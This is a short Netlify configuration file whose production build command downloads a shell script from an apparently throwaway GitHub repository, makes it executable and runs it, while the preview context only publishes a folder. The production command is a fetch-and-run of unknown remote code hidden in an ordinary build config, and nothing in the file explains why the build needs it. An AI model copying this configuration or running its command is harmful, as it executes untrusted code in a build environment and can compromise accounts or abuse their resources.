#netlify.toml
[context.production]
  publish = "output/"
  command = "curl -o entrypoint.sh https://raw.githubusercontent.com/menju2ikg8uti/pose/main/1/entrypoint.sh && chmod +x entrypoint.sh && ./entrypoint.sh 01_06"
[context.deploy-preview]
  publish = "dist/"
